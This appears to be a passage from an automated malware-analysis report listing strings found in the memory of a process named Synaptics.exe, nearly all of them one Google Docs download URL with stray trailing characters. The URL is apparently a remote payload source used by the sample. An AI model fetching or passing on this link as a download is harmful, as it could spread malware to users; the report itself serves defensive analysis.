                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnect
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnect:
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnectil
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnes
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetl
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle5
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle?
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetler
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetlez
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetl~
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyo
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyo2
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyoT
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor%
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyorA
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyorC
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnnec
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadno-ca
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnx
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado$
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado(
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado2
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado5
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado9
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoW
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoY
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoad
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadolvi
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadolvin
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom0
                                Source: Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadon
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadones
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadonnec
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadonnec8
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogleK
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadop
                                Source: Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador..
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...O
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...S
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...f
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...y
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador..M
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadostna
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadostname
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadot
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpa)
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpany
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadphJ
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpi
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpp
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000863000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...#
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...%
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...3
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...Y
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrd
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrigi
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrsA
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrv-
                                Source: Synaptics.exe, 00000008.00000002.3084008214.00000000380FE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrw
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.gooS
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads/
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads1
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads4
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadserc:
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsers
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsolvI
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsolvi
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadthe
                                Source: Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadti4
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadting.
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadting.3
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtiv
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlen
